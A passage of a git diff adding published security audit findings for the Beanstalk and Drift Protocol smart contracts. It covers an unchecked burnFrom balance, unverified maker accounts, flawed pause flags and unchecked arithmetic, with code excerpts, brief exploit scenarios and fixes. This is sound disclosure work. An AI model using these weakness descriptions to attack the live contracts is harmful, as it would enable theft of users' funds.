the contract. While LibUnripe.decrementUnderlying will revert on calls to ripen more than the contract’s balance, it does not check the user’s balance. The source code of the unripeToken contract was not provided for review during this audit, so we could not determine whether its burnFrom method is implemented safely. function ripen ( address unripeToken , uint256 amount , LibTransfer.To mode ) external payable nonReentrant returns ( uint256 underlyingAmount ) { underlyingAmount = getPenalizedUnderlying(unripeToken, amount); LibUnripe.decrementUnderlying(unripeToken, underlyingAmount); IBean(unripeToken).burnFrom( msg.sender , amount); address underlyingToken = s.u[unripeToken].underlyingToken; IERC20(underlyingToken).sendToken(underlyingAmount, msg.sender , mode); emit Ripen( msg.sender , unripeToken, amount, underlyingAmount); } Figure 13.1: The ripen() function in UnripeFacet.sol#L51- Exploit Scenario Alice notices that the burnFrom function is implemented incorrectly in the unripeToken contract. She calls ripen with an amount greater than her unripe token balance and is able to receive the contract’s entire balance of underlying tokens. Recommendations Short term, add an assert statement to ensure that users who call ripen have sufficient balance to burn the given amount of unripe tokens. Long term, implement all security-critical assertions on user-supplied input in the beginning of external functions. Do not rely on untrusted code to perform required safety checks or to behave as expected. +12. Ability to whitelist assets uncorrelated with Bean price, misaligning governance incentives Severity: Undetermined Difficulty: Undetermined Type: Economic Finding ID: TOB-BEANS-012 Target: The Beanstalk protocol Description Stalk is the governance token of the system, rewarded to users who deposit certain whitelisted assets into the silo, the system’s asset storage. When demand for Bean increases, the protocol increases the Bean supply by minting new Bean tokens and allocating some of them to Stalk holders. Additionally, if the price of Bean remains above its peg for an extended period of time, then a season of plenty (SoP) occurs: Bean is minted and sold on the open market in exchange for exogenous assets such as ETH. These exogenous assets are allocated entirely to Stalk holders. When demand for Bean decreases, the protocol decreases the Bean supply by borrowing Bean tokens from Bean owners. If the demand for Bean is persistently low and some of these loans are never repaid, Stalk holders are not directly penalized by the protocol. However, if the only whitelisted assets are strongly correlated with the price of Bean (such as ETH:BEAN LP tokens), then the value of Stalk holders’ deposited collateral would decline, indirectly penalizing Stalk holders for an unhealthy system. If, however, exogenous assets without a strong correlation to Bean are whitelisted, then Stalk holders who have deposited such assets will be protected from financial penalties if the price of Bean crashes. Exploit Scenario Stalk holders vote to whitelist ETH as a depositable asset. They proceed to deposit ETH and begin receiving shares of rewards, including 3CRV tokens acquired during SoPs. Governance is now incentivized to increase the supply of Bean as high as possible to obtain more 3CRV rewards, which eventually results in an overextension of the Bean supply and a subsequent price crash. After the Bean price crashes, Stalk holders withdraw their deposited ETH and 3CRV rewards. Because ETH is not strongly correlated with the price of Bean, they do not suffer financial loss as a result of the crash. Alternatively, because of the lack of on-chain enforcement of off-chain votes, the above scenario could occur if the community multisignature wallet whitelists ETH, even if no related vote occurred. Recommendations Do not allow any assets that are not strongly correlated with the price of Bean to be whitelisted. Additionally, implement monitoring systems that provide alerts every time a new asset is whitelisted. +13. Unchecked burnFrom return value Severity: Informational Difficulty: Undetermined Type: Undefined Behavior Finding ID: TOB-BEANS-013 Target: protocol/contracts/farm/facets/UnripeFacet.sol Description While recapitalizing the Beanstalk protocol, Bean and LP tokens that existed before the 2022 governance hack are represented as unripe tokens. Ripening is the process of burning unripe tokens in exchange for a pro rata share of the underlying assets generated during the Barn Raise. Holders of unripe tokens call the ripen function to receive their portion of the recovered underlying assets. This portion grows while the price of Bean is above its peg, incentivizing users to ripen their tokens later, when more of the loss has been recovered. The ripen code assumes that if users try to redeem more unripe tokens than they hold, burnFrom will revert. If burnFrom returns false instead of reverting, the failure of the balance check will go undetected, and the caller will be able to recover all of the underlying tokens held by the contract. While LibUnripe.decrementUnderlying will revert on calls to ripen more than the contract’s balance, it does not check the user’s balance. The source code of the unripeToken contract was not provided for review during this audit, so we could not determine whether its burnFrom method is implemented safely. function ripen ( address unripeToken , uint256 amount , LibTransfer.To mode ) external payable nonReentrant returns ( uint256 underlyingAmount ) { underlyingAmount = getPenalizedUnderlying(unripeToken, amount); LibUnripe.decrementUnderlying(unripeToken, underlyingAmount); IBean(unripeToken).burnFrom( msg.sender , amount); address underlyingToken = s.u[unripeToken].underlyingToken; IERC20(underlyingToken).sendToken(underlyingAmount, msg.sender , mode); emit Ripen( msg.sender , unripeToken, amount, underlyingAmount); } Figure 13.1: The ripen() function in UnripeFacet.sol#L51- Exploit Scenario Alice notices that the burnFrom function is implemented incorrectly in the unripeToken contract. She calls ripen with an amount greater than her unripe token balance and is able to receive the contract’s entire balance of underlying tokens. Recommendations Short term, add an assert statement to ensure that users who call ripen have sufficient balance to burn the given amount of unripe tokens. Long term, implement all security-critical assertions on user-supplied input in the beginning of external functions. Do not rely on untrusted code to perform required safety checks or to behave as expected. diff --git a/findings_newupdate/2022-07-mobilecoin-securityreview.txt b/findings_newupdate/tob/2022-07-mobilecoin-securityreview.txt similarity index 100% rename from findings_newupdate/2022-07-mobilecoin-securityreview.txt rename to findings_newupdate/tob/2022-07-mobilecoin-securityreview.txt diff --git a/findings_newupdate/2022-09-aleosystems-snarkvm-securityreview.txt b/findings_newupdate/tob/2022-09-aleosystems-snarkvm-securityreview.txt similarity index 100% rename from findings_newupdate/2022-09-aleosystems-snarkvm-securityreview.txt rename to findings_newupdate/tob/2022-09-aleosystems-snarkvm-securityreview.txt diff --git a/findings_newupdate/2022-09-alphasoc-alphasocapi-securityreview.txt b/findings_newupdate/tob/2022-09-alphasoc-alphasocapi-securityreview.txt similarity index 100% rename from findings_newupdate/2022-09-alphasoc-alphasocapi-securityreview.txt rename to findings_newupdate/tob/2022-09-alphasoc-alphasocapi-securityreview.txt diff --git a/findings_newupdate/2022-09-incrementprotocol-securityreview.txt b/findings_newupdate/tob/2022-09-incrementprotocol-securityreview.txt similarity index 100% rename from findings_newupdate/2022-09-incrementprotocol-securityreview.txt rename to findings_newupdate/tob/2022-09-incrementprotocol-securityreview.txt diff --git a/findings_newupdate/2022-09-maplefinance-mapleprotocolv2-securityreview.txt b/findings_newupdate/tob/2022-09-maplefinance-mapleprotocolv2-securityreview.txt similarity index 100% rename from findings_newupdate/2022-09-maplefinance-mapleprotocolv2-securityreview.txt rename to findings_newupdate/tob/2022-09-maplefinance-mapleprotocolv2-securityreview.txt diff --git a/findings_newupdate/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.txt b/findings_newupdate/tob/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.txt similarity index 100% rename from findings_newupdate/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.txt rename to findings_newupdate/tob/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.txt diff --git a/findings_newupdate/2022-10-GSquared-securityreview.txt b/findings_newupdate/tob/2022-10-GSquared-securityreview.txt similarity index 100% rename from findings_newupdate/2022-10-GSquared-securityreview.txt rename to findings_newupdate/tob/2022-10-GSquared-securityreview.txt diff --git a/findings_newupdate/2022-10-fraxfinance-fraxlend-fraxferry-securityreview.txt b/findings_newupdate/tob/2022-10-fraxfinance-fraxlend-fraxferry-securityreview.txt similarity index 100% rename from findings_newupdate/2022-10-fraxfinance-fraxlend-fraxferry-securityreview.txt rename to findings_newupdate/tob/2022-10-fraxfinance-fraxlend-fraxferry-securityreview.txt diff --git a/findings_newupdate/tob/2022-11-folksfinance-securityreview.txt b/findings_newupdate/tob/2022-11-folksfinance-securityreview.txt new file mode 100644 index 0000000..bb94104 Binary files /dev/null and b/findings_newupdate/tob/2022-11-folksfinance-securityreview.txt differ diff --git a/findings_newupdate/2022-11-optimism-securityreview.txt b/findings_newupdate/tob/2022-11-optimism-securityreview.txt similarity index 100% rename from findings_newupdate/2022-11-optimism-securityreview.txt rename to findings_newupdate/tob/2022-11-optimism-securityreview.txt diff --git a/findings_newupdate/2022-12-curl-securityreview.txt b/findings_newupdate/tob/2022-12-curl-securityreview.txt similarity index 100% rename from findings_newupdate/2022-12-curl-securityreview.txt rename to findings_newupdate/tob/2022-12-curl-securityreview.txt diff --git a/findings_newupdate/tob/2022-12-driftlabs-driftprotocol-securityreview.txt b/findings_newupdate/tob/2022-12-driftlabs-driftprotocol-securityreview.txt new file mode 100644 index 0000000..05a6736 --- /dev/null +++ b/findings_newupdate/tob/2022-12-driftlabs-driftprotocol-securityreview.txt @@ -0,0 +1,20 @@ +1. Lack of build instructions Severity: Informational Difficulty: High Type: Testing Finding ID: TOB-DRIFT-1 Target: README.md Description The Drift Protocol repository does not contain instructions to build, compile, test, or run the project. The project’s README should include at least the following information: ● ● ● Instructions for building the project Instructions for running the built artifacts Instructions for running the project’s tests The closest thing we have found to build instructions appears in a script in the drift-sim repository (figure 1.1). As shown in the figure below, building the project is non-trivial. Users should not be required to rediscover these steps on their own. git submodule update --init --recursive # build v2 cd driftpy/protocol-v2 yarn && anchor build # build dependencies for v2 cd deps/serum-dex/dex && anchor build && cd ../../.. # go back to top-level cd ../../ Figure 1.1: drift-sim/setup.sh Additionally, the project relies on serum-dex , which currently has an open issue regarding outdated build instructions. Thus, if a user visits the serum-dex repository to learn how to build the dependency, they will be misled. Exploit Scenario Alice attempts to build and deploy her own copy of the Drift Protocol smart contract. Without instructions, Alice deploys it incorrectly. Users of Alice’s copy of the smart contract suffer financial loss. Recommendations Short term, add the minimal information listed above to the project’s README . This will help users to build, run, and test the project . Long term, as the project evolves, ensure that the README is updated. This will help ensure that the README does not communicate incorrect information to users . References ● Documentation points to do.sh +2. Inadequate testing Severity: Informational Difficulty: High Type: Testing Finding ID: TOB-DRIFT-2 Target: .github/workflows/main.yml , test-scripts/run-anchor-tests.sh Description The Anchor tests are not run as part of Drift Protocol’s CI process. Moreover, the script responsible for running the Anchor tests does not run all of them. Integrating all Anchor tests into the CI process and updating the script so it runs all tests will help ensure they are run regularly and consistently. Figure 2.1 shows a portion of the project’s main GitHub workflow, which runs the project’s unit tests. However, the file makes no reference to the project’s Anchor tests. - name : Run unit tests run : cargo test --lib # run unit tests Figure 2.1: .github/workflows/main.yml#L52–L53 Furthermore, the script used to run the Anchor tests runs only some of them. The relevant part of the script appears in figure 2.2. The test_files array contains the names of nearly all of the files containing tests in the tests directory. However, the array lacks the following entries, and consequently does not run their tests: ● ksolver.ts ● tokenFaucet.ts test_files =( postOnlyAmmFulfillment.ts imbalancePerpPnl.ts ... # 42 entries cancelAllOrders.ts ) Figure 2.2: test-scripts/run-anchor-tests.sh#L7–L53 Exploit Scenario Alice, a Drift Protocol developer, unwittingly introduces a bug into the codebase. The test would be revealed by the Anchor tests. However, because the Anchor tests are not run in CI, the bug goes unnoticed. Recommendations Short term: ● ● Adjust the main GitHub workflow so that it runs the Anchor tests. Adjust the run-anchor-tests.sh script so that it runs all Anchor tests (including those in ksolver.ts and tokenFaucet.ts ). Taking these steps will help to ensure that all Anchor tests are run regularly and consistently. Long term, revise the run-anchor-tests.sh script so that the test_files array is not needed. Move files that do not contain tests into a separate directory, so that only files containing tests remain. Then, run the tests in all files in the tests directory. Adopting such an approach will ensure that newly added tests are automatically run. +3. Invalid audit.toml prevents cargo audit from being run Severity: Informational Difficulty: High Type: Auditing and Logging Finding ID: TOB-DRIFT-3 Target: audit.toml Description The project’s anchor.toml file contains an invalid key. This makes running cargo audit on the project impossible. The relevant part of the audit.toml file appears in figure 3.1. The packages key is unrecognized by cargo audit . As a result, cargo audit produces the error in figure 3.2 when run on the protocol-v2 repository. [packages] source = "all" # "all", "public" or "local" Figure 3.1: .cargo/audit.toml#L27–L28 error: cargo-audit fatal error: parse error: unknown field `packages`, expected one of `advisories`, `database`, `output`, `target`, `yanked` at line 30 column 1 Figure 3.2: Error produced by cargo audit when run on the protocol-v2 repository Exploit Scenario A vulnerability is discovered in a protocol-v2 dependency. A RUSTSEC advisory is issued for the vulnerability, but because cargo audit cannot be run on the repository, the vulnerability goes unnoticed. Users suffer financial loss. Recommendations Short term, either remove the packages table from the anchor.toml file or replace it with a table recognized by cargo audit . In the project’s current state, cargo audit cannot be run on the project. Long term, regularly run cargo audit in CI and verify that it runs to completion without producing any errors or warnings. This will help the project receive the full benefits of running cargo audit by identifying dependencies with RUSTSEC advisories. +4. Race condition in Drift SDK Severity: Undetermined Difficulty: Low Type: Undefined Behavior Finding ID: TOB-DRIFT-4 Target: sdk directory Description A race condition in the Drift SDK causes client programs to operate on non-existent or possibly stale data. The race condition affects many of the project’s Anchor tests, making them unreliable. Use of the SDK in production could have financial implications. When running the Anchor tests, the error in figure 4.1 appears frequently. The data field that the error refers to is read by the getUserAccount function (figure 4.2). This function tries to read the data field from a DataAndSlot object obtained by calling getUserAccountAndSlot (figure 4.3). That DataAndSlot object is set by the handleRpcResponse function (figure 4.4). TypeError: Cannot read properties of undefined (reading 'data') at User.getUserAccount (sdk/src/user.ts:122:56) at DriftClient.getUserAccount (sdk/src/driftClient.ts:663:37) at DriftClient. (sdk/src/driftClient.ts:1005:25) at Generator.next () at fulfilled (sdk/src/driftClient.ts:28:58) at processTicksAndRejections (node:internal/process/task_queues:96:5) Figure 4.1: Error that appears frequently when running the Anchor tests public getUserAccount(): UserAccount { return this .accountSubscriber.getUserAccountAndSlot(). data ; } Figure 4.2: sdk/src/user.ts#L121–L123 public getUserAccountAndSlot(): DataAndSlot { this .assertIsSubscribed(); return this .userDataAccountSubscriber. dataAndSlot ; } Figure 4.3: sdk/src/accounts/webSocketUserAccountSubscriber.ts#L72–L75 handleRpcResponse(context: Context , accountInfo?: AccountInfo ): void { ... if (newBuffer && (!oldBuffer || !newBuffer.equals(oldBuffer))) { this .bufferAndSlot = { buffer: newBuffer , slot: newSlot , }; const account = this .decodeBuffer(newBuffer); this .dataAndSlot = { data: account , slot: newSlot , }; this .onChange(account); } } Figure 4.4: sdk/src/accounts/webSocketAccountSubscriber.ts#L55–L95 If a developer calls getUserAccount but handleRpcResponse has not been called since the last time the account was updated, stale data will be returned. If handleRpcResponse has never been called for the account in question, an error like that shown in figure 4.1 arises. Note that a developer can avoid the race by calling WebSocketAccountSubscriber.fetch (figure 4.5). However, the developer must manually identify locations where such calls are necessary. Errors like the one shown in figure 4.1 appear frequently when running the Anchor tests, which suggests that identifying such locations is nontrivial. async fetch(): Promise < void > { const rpcResponse = await this .program.provider.connection.getAccountInfoAndContext( this .accountPublicKey, ( this .program.provider as AnchorProvider).opts.commitment ); this .handleRpcResponse(rpcResponse.context, rpcResponse?.value); } Figure 4.5: sdk/src/accounts/webSocketAccountSubscriber.ts#L46–L53 We suspect this problem applies to not just user accounts, but any account fetched via a subscription mechanism (e.g., state accounts or perp market accounts). Note that despite the apparent race condition, Drift Protocol states that the tests run reliably for them. Exploit Scenario Alice, unaware of the race condition, writes client code that uses the Drift SDK. Alice’s code unknowingly operates on stale data and proceeds with a transaction, believing it will result in financial gain. However, when processed with actual on-chain data, the transaction results in financial loss for Alice. Recommendations Short term, rewrite all account getter functions so that they automatically call WebSocketAccountSubscriber.fetch . This will eliminate the need for developers to deal with the race manually. Long term, investigate whether using a subscription mechanism is actually needed. Another Solana RPC call could solve the same problem yet be more efficient than a subscription combined with a manual fetch. +5. Loose size coupling between function invocation and requirement Severity: Informational Difficulty: High Type: Undefined Behavior Finding ID: TOB-DRIFT-5 Target: programs/drift/src/state/events.rs Description The implementation of the emit_stack function relies on the caller to use a sufficiently large buffer space to hold a Base64-encoded representation of the discriminator along with the serialized event. Failure to provide sufficient space will result in an out-of-bounds attempt on either the write operation or the in the base64::encode_config_slice call. emit_stack::<_, 424 >(order_action_record); Figure 5.1: programs/drift/src/controller/orders.rs#L545 pub fn emit_stack (event: T ) { let mut data_buf = [ 0 u8 ; N]; let mut out_buf = [ 0 u8 ; N]; emit_buffers(event, & mut data_buf[..], & mut out_buf[..]) } pub fn emit_buffers ( event: T , data_buf: & mut [ u8 ], out_buf: & mut [ u8 ], ) { let mut data_writer = std::io::Cursor::new(data_buf); data_writer .write_all(&::discriminator()) .unwrap(); borsh::to_writer(& mut data_writer, &event).unwrap(); let data_len = data_writer.position() as usize ; let out_len = base64::encode_config_slice( &data_writer.into_inner()[ 0 ..data_len], base64::STANDARD, out_buf, ); let msg_bytes = &out_buf[ 0 ..out_len]; let msg_str = unsafe { std:: str ::from_utf8_unchecked(msg_bytes) }; msg!(msg_str); } Figure 5.2: programs/drift/src/state/events.rs#L482–L511 Exploit Scenario A maintainer of the smart contract is unaware of this implicit size requirement and adds a call to emit_stack using too small a buffer, or changes are made to a type without a corresponding change to all places where emit_stack uses that type. If the changed code is not covered by tests, the problem will manifest during contract operation, and could cause an instruction to panic, thereby reverting the transaction. Recommendations Short term, add a size constant to the type, and calculate the amount of space required for holding the respective buffers. This ensures that changes to a type's size can be made throughout the code. Long term, create a trait to be used by the types with which emit_stack is intended to work. This can be used to handle the size of the type, and also any other future requirement for types used by emit_stack . +6. The zero-copy feature in Anchor is experimental Severity: Informational Difficulty: High Type: Undefined Behavior Finding ID: TOB-DRIFT-6 Target: State structs Description Several structs for keeping state use Anchor’s zero-copy functionality. The Anchor documentation states that this is still an experimental feature that should be used only when Borsh serialization cannot be used without hitting the stack or heap limits. Exploit Scenario The Anchor framework has a bug in the zero-copy feature, or updates it with a breaking change, in a way that affects the security model of the Drift smart contract. An attacker discovers this problem and leverages it to steal funds from the contract. #[account(zero_copy)] #[derive(Default, Eq, PartialEq, Debug)] #[repr(C)] pub struct User { pub authority: Pubkey , pub delegate: Pubkey , pub name: [ u8 ; 32 ], pub spot_positions: [SpotPosition; 8 ], pub perp_positions: [PerpPosition; 8 ], pub orders: [Order; 32 ], pub last_add_perp_lp_shares_ts: i64 , pub total_deposits: u64 , pub total_withdraws: u64 , pub total_social_loss: u64 , // Fees (taker fees, maker rebate, referrer reward, filler reward) and pnl for perps pub settled_perp_pnl: i64 , // Fees (taker fees, maker rebate, filler reward) for spot pub cumulative_spot_fees: i64 , pub cumulative_perp_funding: i64 , pub liquidation_margin_freed: u64 , // currently unimplemented // currently unimplemented pub liquidation_start_ts: i64 , pub next_order_id: u32 , pub max_margin_ratio: u32 , pub next_liquidation_id: u16 , pub sub_account_id: u16 , pub status: UserStatus , pub is_margin_trading_enabled: bool , pub padding: [ u8 ; 26 ], } Figure 6.1: Example of a struct using zero copy Recommendations Short term, evaluate if it is possible to move away from using zero copy without hitting the stack or heap limits, and do so if possible. Not relying on experimental features reduces the risk of exposure to bugs in the Anchor framework. Long term, adopt a conservative stance by using stable versions of packages and features. This reduces both risk and time spent on maintaining compatibility with code still in flux. +7. Hard-coded indices into account data Severity: Informational Difficulty: High Type: Undefined Behavior Finding ID: TOB-DRIFT-7 Target: perp_market_map.rs, spot_market_map.rs Description The implementations for both PerpMarketMap and SpotMarketMap use hard-coded indices into the accounts data in order to retrieve the marked_index property without having to deserialize all the data. // market index 1160 bytes from front of account let market_index = u16 ::from_le_bytes(*array_ref![data, 1160 , 2 ]); Figure 7.1: programs/drift/src/state/perp_market_map.rs#L110–L111 let market_index = u16 ::from_le_bytes(*array_ref![data, 684 , 2 ]); Figure 7.2: programs/drift/src/state/spot_market_map.rs#L174 Exploit Scenario Alice, a Drift Protocol developer, changes the layout of the structure or the width of the market_index property but fails to update one or more of the hard-coded indices. Mallory notices this bug and finds a way to use it to steal funds. Recommendations Short term, add consts that include the value of the indices and the type size. Also add comments explaining the calculation of the values. This ensures that by updating the constants, all code relying on the operation will retrieve the correct part of the unlying data. Long term, add an implementation to the struct to unpack the market_index from the serialized state. This reduces the maintenance burden of updating the code that accesses data in this way. +8. Missing verification of maker and maker_stats accounts Severity: Undetermined Difficulty: Medium Type: Data Validation Finding ID: TOB-DRIFT-8 Target: programs/drift/src/instructions/user.rs Description The handle_place_and_take_perp_order and handle_place_and_take_spot_order functions retrieve two additional accounts that are passed to the instruction: maker and maker_stats . However, there is no check that the two accounts are linked (i.e., that their authority is the same). Due to time constraints, we were unable to determine the impact of this finding. pub fn get_maker_and_maker_stats <'a>( account_info_iter: & mut Peekable>>, ) -> DriftResult <(AccountLoader<'a, User>, AccountLoader<'a, UserStats>)> { let maker_account_info = next_account_info(account_info_iter).or( Err (ErrorCode::MakerNotFound))?; validate!( maker_account_info.is_writable, ErrorCode::MakerMustBeWritable )?; let maker: AccountLoader = AccountLoader::try_from(maker_account_info).or( Err (ErrorCode::CouldNotDeserializeMak er))?; let maker_stats_account_info = next_account_info(account_info_iter).or( Err (ErrorCode::MakerStatsNotFound))?; validate!( maker_stats_account_info.is_writable, ErrorCode::MakerStatsMustBeWritable )?; let maker_stats: AccountLoader = AccountLoader::try_from(maker_stats_account_info) .or( Err (ErrorCode::CouldNotDeserializeMakerStats))?; Ok ((maker, maker_stats)) } Figure 8.1: programs/drift/src/instructions/optional_accounts.rs#L47–L74 Exploit Scenario Mallory passes two unlinked accounts of the correct type in the places for maker and maker_stats , respectively. This causes the contract to operate outside of its intended use. Recommendations Short term, add a check that the authority of the accounts are the same. Long term, add all code for authentication of accounts to the front of instruction handlers. This increases the clarity of the checks and helps with auditing the authentication. +9. Panics used for error handling Severity: Informational Difficulty: High Type: Error Reporting Finding ID: TOB-DRIFT-9 Target: Various files in programs/drift Description In several places, the code panics when an arithmetic overflow or underflow occurs. Panics should be reserved for programmer errors (e.g., assertion violations). Panicking on user errors dilutes the utility of the panic operation. An example appears in figure 9.1. The adjust_amm function uses both the question mark operator ( ? ) and unwrap to handle errors resulting from “peg” related calculations. An overflow or underflow could result from an invalid input to the function. An error should be returned in such cases. budget_delta_peg = budget_i128 .safe_add(adjustment_cost.abs())? .safe_mul(PEG_PRECISION_I128)? .safe_div(per_peg_cost)?; budget_delta_peg_magnitude = budget_delta_peg.unsigned_abs(); new_peg = if budget_delta_peg > 0 { ... } else if market.amm.peg_multiplier > budget_delta_peg_magnitude { market .amm .peg_multiplier .safe_sub(budget_delta_peg_magnitude) .unwrap() } else { 1 }; Figure 9.1: programs/drift/src/math/repeg.rs#L349–L369 Running Clippy with the following command identifies 66 locations in the drift package where expect or unwrap is used: cargo clippy -p drift -- -A clippy::all -W clippy::expect_used -W clippy::unwrap_used Many of those uses appear to be related to invalid input. Exploit Scenario Alice, a Drift Protocol developer, observes a panic in the Drift Protocol codebase. Alice ignores the panic, believing that it is caused by user error, but it is actually caused by a bug she introduced. Recommendations Short term, reserve the use of panics for programmer errors. Have relevant areas of the code return Result::Err on user errors. Adopting such a policy will help to distinguish the two types of errors when they occur. Long term, consider denying the following Clippy lints: ● clippy::expect_used ● clippy::unwrap_used ● clippy::panic Although this will not prevent all panics, it will prevent many of them. +10. Testing code used in production Severity: Undetermined Difficulty: Undetermined Type: Patching Finding ID: TOB-DRIFT-10 Target: programs/drift/src/state/{oracle_map.rs, perp_market.rs} Description In some locations in the Drift Protocol codebase, testing code is mixed with production code with no way to discern between them. Testing code should be clearly indicated as such and guarded by #[cfg(test)] to avoid being called in production. Examples appear in figures 10.1 and 10.2. The OracleMap struct has a quote_asset_price_data field that is used only when get_price_data is passed a default Pubkey . Similarly, the AMM implementation contains functions that are used only for testing and are not guarded by #[cfg(test)] . pub struct OracleMap <'a> { oracles: BTreeMap >, price_data: BTreeMap , pub slot: u64 , pub oracle_guard_rails: OracleGuardRails , pub quote_asset_price_data: OraclePriceData , } impl <'a> OracleMap<'a> { ... pub fn get_price_data (& mut self , pubkey: & Pubkey ) -> DriftResult <&OraclePriceData> { if pubkey == &Pubkey::default() { return Ok (& self .quote_asset_price_data); } Figure 10.1: programs/drift/src/state/oracle_map.rs#L22–L47 impl AMM { pub fn default_test () -> Self { let default_reserves = 100 * AMM_RESERVE_PRECISION; // make sure tests dont have the default sqrt_k = 0 AMM { Figure 10.2: programs/drift/src/state/perp_market.rs#L490–L494 Drift Protocol has indicated that the quote_asset_price_data field (figure 10.1) is used in production. This raises concerns because there is currently no way to set the contents of this field, and no asset’s price is perfectly constant (e.g., even stablecoins’ prices fluctuate). For this reason, we have changed this finding’s severity from Informational to Undetermined. Exploit Scenario Alice, a Drift Protocol developer, introduces code that calls the default_test function, not realizing it is intended only for testing. Alice introduces a bug as a result. Recommendations Short term, to the extent possible, avoid mixing testing and production code by, for example, using separate data types and storing the code in separate files. When testing and production code must be mixed, clearly mark the testing code as such, and guard it with #[cfg(test)] . These steps will help to ensure that testing code is not deployed in production. Long term, as new code is added to the codebase, ensure that the aforementioned standards are maintained. Testing code is not typically held to the same standards as production code, so it is more likely to include bugs. +11. Inconsistent use of checked arithmetic Severity: Undetermined Difficulty: Undetermined Type: Data Validation Finding ID: TOB-DRIFT-11 Target: Various files in programs/drift Description In several locations, the Drift Protocol codebase uses unchecked arithmetic. For example, in calculate_margin_requirement_and_total_collateral_and_liability_info (figure 11.1), the variable num_perp_liabilities is used as an operand in both a checked and an unchecked operation. To protect against overflows and underflows, unchecked arithmetic should be used sparingly. num_perp_liabilities += 1 ; } with_isolated_liability &= margin_requirement > 0 && market.contract_tier == ContractTier::Isolated; } if num_spot_liabilities > 0 { validate!( margin_requirement > 0 , ErrorCode::InvalidMarginRatio, "num_spot_liabilities={} but margin_requirement=0" , num_spot_liabilities )?; } let num_of_liabilities = num_perp_liabilities.safe_add(num_spot_liabilities) ?; Figure 11.1: programs/drift/src/math/margin.rs#L499–L515 Note that adding the following to the crate root will cause Clippy to fail the build whenever unchecked arithmetic is used: #![deny(clippy::integer_arithmetic)] Exploit Scenario Alice, a Drift Protocol developer, unwittingly introduces an arithmetic overflow bug into the codebase. The bug would have been revealed by the use of checked arithmetic. However, because unchecked arithmetic is used, the bug goes unnoticed. Recommendations Short term, add the #![deny(clippy::integer_arithmetic)] attribute to the drift crate root. Add #[allow(clippy::integer_arithmetic)] in rare situations where code is performance critical and its safety can be guaranteed through other means. Taking these steps will reduce the likelihood of overflow or underflow bugs residing in the codebase. Long term, if additional Solana programs are added to the codebase, ensure the #![deny(clippy::integer_arithmetic)] attribute is also added to them. This will reduce the likelihood that newly introduced crates contain overflow or underflow bugs. +12. Inconsistent and incomplete exchange status checks Severity: Medium Difficulty: High Type: Access Controls Finding ID: TOB-DRIFT-12 Target: programs/drift/src/instructions/{admin.rs , keeper.rs , user.rs}, programs/drift/src/state/state.rs Description Drift Protocol’s representation of the exchange’s status has several problems: ● ● ● The exchange’s status is represented using an enum , which does not allow more than one individual operation to be paused (figures 12.1 and 12.2). As a result, an administrator could inadvertently unpause one operation by trying to pause another (figure 12.3). The ExchangeStatus variants do not map cleanly to exchange operations. For example, handle_transfer_deposit checks whether the exchange status is WithdrawPaused (figure 12.4). The function’s name suggests that the function checks whether “transfers” or “deposits” are paused. The ExchangeStatus is checked in multiple inconsistent ways. For example, in handle_update_funding_rate (figure 12.5), both an access_control attribute and the body of the function include a check for whether the exchange status is FundingPaused . pub enum ExchangeStatus { Active, FundingPaused, AmmPaused, FillPaused, LiqPaused, WithdrawPaused, Paused, } Figure 12.1: programs/drift/src/state/state.rs#L36–L44 #[account] #[derive(Default)] #[repr(C)] pub struct State { pub admin: Pubkey , pub whitelist_mint: Pubkey , ... pub exchange_status: ExchangeStatus , pub padding: [ u8 ; 17 ], } Figure 12.2: programs/drift/src/state/state.rs#L8–L33 pub fn handle_update_exchange_status ( ctx: Context , exchange_status: ExchangeStatus , ) -> Result <()> { ctx.accounts.state.exchange_status = exchange_status; Ok (()) } Figure 12.3: programs/drift/src/instructions/admin.rs#L1917–L1923 #[access_control( withdraw_not_paused (&ctx.accounts.state) )] pub fn handle_transfer_deposit ( ctx: Context , market_index: u16 , amount: u64 , ) -> anchor_lang :: Result <()> { Figure 12.4: programs/drift/src/instructions/user.rs#L466–L473 #[access_control( market_valid(&ctx.accounts.perp_market) funding_not_paused (&ctx.accounts.state) valid_oracle_for_perp_market(&ctx.accounts.oracle, &ctx.accounts.perp_market) )] pub fn handle_update_funding_rate ( ctx: Context , perp_market_index: u16 , ) -> Result <()> { ... let is_updated = controller::funding::update_funding_rate( perp_market_index, perp_market, & mut oracle_map, now, &state.oracle_guard_rails, matches! (state.exchange_status, ExchangeStatus::FundingPaused ), None , )?; ... } Figure 12.5: programs/drift/src/instructions/keeper.rs#L1027–L1078 The Medium post describing the incident that occurred around May 11, 2022 suggests that the exchange’s pausing mechanisms contributed to the incident’s subsequent fallout: The protocol did not have a kill-switch where only withdrawals were halted. The protocol was paused in the second pause to prevent a further drain of user funds… This suggests that the pausing mechanisms should receive heightened attention to reduce the damage should another incident occur. Exploit Scenario Mallory tricks an administrator into pausing funding after withdrawals have already been paused. By pausing funding, the administrator unwittingly unpauses withdrawals. Recommendations Short term: ● ● ● Represent the exchange’s status as a set of flags. This will allow individual operations to be paused independently of one another. Ensure exchange statuses map cleanly to the operations that can be paused. Add documentation where there is potential for confusion. This will help ensure developers check the proper exchange statuses. Adopt a single approach for checking the exchange’s status and apply it consistently throughout the codebase. If an exception must be made for a check, explain why in a comment near that check. Adopting such a policy will reduce the likelihood that a missing check goes unnoticed. Long term, periodically review the exchange status checks. Since the exchange status checks represent a form of access control, they deserve heightened scrutiny. Moreover, the exchange’s pausing mechanisms played a role in past incidents. +13. Spot market access controls are incomplete Severity: Informational Difficulty: Undetermined Type: Access Controls Finding ID: TOB-DRIFT-13 Target: programs/drift/src/instructions/{admin.rs , user.rs} Description Functions in admin.rs involving perpetual markets verify that the market is valid, i.e., not delisted (figure 13.1). However, functions involving spot markets do not include such checks (e.g., figure 13.2). Drift Protocol has indicated that the spot market implementation is incomplete. #[access_control( market_valid(&ctx.accounts.perp_market) )] pub fn handle_update_perp_market_expiry ( ctx: Context , expiry_ts: i64 , ) -> Result <()> { Figure 13.1: programs/drift/src/instructions/admin.rs#L676–L682 _ pub fn handle_update_spot_market_expiry ( ctx: Context , expiry_ts: i64 , ) -> Result <()> { Figure 13.2: programs/drift/src/instructions/admin.rs#L656–L660 A similar example concerning whether the exchange is paused appears in figure 13.3 and 13.4. #[access_control( exchange_not_paused(&ctx.accounts.state) )] pub fn handle_place_perp_order (ctx: Context , params: OrderParams ) -> Result <()> { Figure 13.3: 